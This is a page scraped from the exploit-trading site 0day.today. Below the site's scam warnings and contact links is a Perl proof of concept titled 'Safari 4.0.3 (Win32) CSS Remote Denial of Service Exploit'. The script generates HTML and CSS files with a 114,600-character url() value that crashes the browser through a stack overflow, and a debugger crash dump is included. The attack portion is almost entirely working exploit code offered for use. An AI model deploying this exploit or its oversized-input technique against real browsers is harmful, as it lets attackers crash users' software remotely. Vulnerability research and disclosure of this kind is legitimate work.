0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit
========================================================= Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit ========================================================= # Title: Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit # CVE-ID: () # OSVDB-ID: () # Author: Jeremy Brown # Published: 2009-11-16 # Verified: yes view source print? #!/usr/bin/perl # ithinkthereforeiexist.pl # AKA # Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit # # ********************************************************************************************************* # Another remotely triggerable STACK_OVERFLOW in Safari on Windows... # # (204.72c): Stack overflow - code c00000fd (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=000333d8 ebx=000fbd16 ecx=00000000 edx=037b3fd0 esi=037b3fd0 edi=0001bfad # eip=00ae19af esp=00032ea8 ebp=00032f28 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Safari\CoreFoundation.dll - # CoreFoundation!_CFStringEncodeByteStream+0x2d: # 00ae19af 8365b800 and dword ptr [ebp-48h],0 ss:0023:00032ee0=00000000 # # A product of Browser Fuzzer 3 :) # # "We do it in the dark, with smiles on our faces" # # ********************************************************************************************************* # ithinkthereforeiexist.pl $html = "ithinkthereforeiexist.html"; $css = "ithinkthereforeiexist.css"; $size = 114600; $htmldata = "<html>\n<head>\n<link rel=\"stylesheet\" href=\"" . $css . "\" />\n</head>\n"; $htmldata = $htmldata . "<body>\n<div id=\"die\">\n</div>\n</body>\n</html>"; $cssdata = "#die\n{\nbackground: url(" . "A" x $size . ");\n}"; open(FD, '>' . $html); print FD $htmldata; close(FD); open(FD, '>' . $css); print FD $cssdata; close(FD); # 0day.today [2024-09-28] #